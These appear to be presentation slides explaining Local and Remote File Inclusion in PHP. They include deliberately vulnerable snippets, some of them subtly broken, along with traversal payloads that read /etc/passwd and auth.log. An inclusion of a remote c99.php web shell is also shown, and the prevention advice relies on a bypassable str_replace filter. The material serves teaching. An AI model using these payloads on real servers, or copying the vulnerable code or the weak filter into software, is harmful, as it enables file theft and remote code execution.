6. #Local File Inclusion
Local File Inclusion is the process of including files on
a server through the web browser. This vulnerability
occurs when a page include is not properly sanitized,
and allows directory traversal characters to be injected.
<?php
$page=$_GET[“page”];
include($_GET[“$page”]); Vulnerable !!
?>
7. #Local File Inclusion
What if the attacker assigns page to be
"../../../../etc/passwd". It causes the attacker to read a
content from /etc/passwd.
Vulnerable Function’s leads to LFI
-include()
-include_once()
-require()
-require_once()
-fopen()
9. #Local File Inclusion
<?php
if($_GET[“page”]) {
$file = preg_replace(‘/x00.*/’, “” ,$file);
include($file);
}
?>
o In This Case we may use terminator’s(%00) to execute LFI
Eg: ?page=../../../../../../../../var/log/auth.log%00
11. #Remote File Inclusion
RFI stands for Remote File Inclusion that allows the attacker to
upload a custom coded/malicious file on a website or server. The
vulnerability exploit the poor validation checks in websites and
can eventually lead to code execution on server or code execution
on website (XSS attack using JavaScript).
<?php
$file ="http://Somesite/c99.php?"; //$_GET['page'];
include($file .".php"); //include (http://Somesite/C99.php?.php)
?>
12. #Prevention
Do not permit appending file paths directly.
Use str_replace(‘../’, ‘ ’, $_GET[‘file’]);
If you definitely need dynamic path concatenation,
ensure you only accept required characters such as "a-Z
0-9" and do not allow ".." or "/" or "%00" (null byte) or
any other similar unexpected characters.